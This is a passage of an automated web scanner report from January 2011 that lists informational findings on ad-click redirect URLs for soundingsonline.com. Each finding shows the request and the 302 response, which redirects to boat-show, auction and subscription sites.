P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/673709863/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/673709863/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/673709863/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/674816273/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/674816273/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/674816273/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:02:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/681435823/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/681435823/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/681435823/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:37:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/707347491/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/707347491/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/707347491/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

20.456. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/727119196/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/727119196/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/727119196/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/729172523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/729172523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/729172523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/730225288/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/730225288/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/730225288/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/738205021/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/738205021/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/738205021/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/739958962/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/739958962/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/739958962/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
